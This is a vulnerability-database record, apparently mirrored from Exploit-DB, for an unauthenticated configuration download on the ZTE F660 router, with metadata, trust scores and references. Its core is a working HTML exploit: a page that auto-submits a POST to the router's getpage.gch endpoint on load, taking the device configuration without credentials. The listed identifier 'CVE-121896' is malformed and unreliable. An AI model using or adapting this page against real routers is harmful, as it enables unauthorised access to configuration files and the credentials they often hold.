ID
VAR-E-201505-0063
EDB ID
36978
TITLE
ZTE F660 - Remote Configuration Download - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
ZTE F660 - Remote Configuration Download. CVE-121896 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | zte | model: | f660 | scope: | - | version: | - | Trust: 1.6 |
EXPLOIT
/*
Exploit Title : ZTE remote configuration download
Date : 09 May 2015
Exploit Author : Daniel Cisa
Vendor Homepage : http://wwwen.zte.com.cn/en/
Platform : Hardware
Tested On : ZTE F660
Firmware Version: 2.22.21P1T8S
--------------------------
Config remote download
--------------------------
ZTE F660 Embedded Software does not check Cookies And Credentials on POST
method so
attackers could download the config file with this post method without
authentication.
*/
<html>
<body onload="document.fDownload.submit();">
<form name="fDownload" method="POST" action="
http://192.168.1.1/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch"
enctype="multipart/form-data" onsubmit="return false;">
Request Sent....
<input type="hidden" name="config" id="config" value="">
</body>
</html>
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Configuration Download
Trust: 1.0
CREDITS
Daniel Cisa
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 36978 | Trust: 1.6 |
| db: | EDBNET | id: | 60473 | Trust: 0.6 |
REFERENCES
| url: | https://www.exploit-db.com/exploits/36978/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 36978 |
| db: | EDBNET | id: | 60473 |
LAST UPDATE DATE
2022-07-27T09:58:41.767000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 36978 | date: | 2015-05-11T00:00:00 |
| db: | EDBNET | id: | 60473 | date: | 2015-05-11T00:00:00 |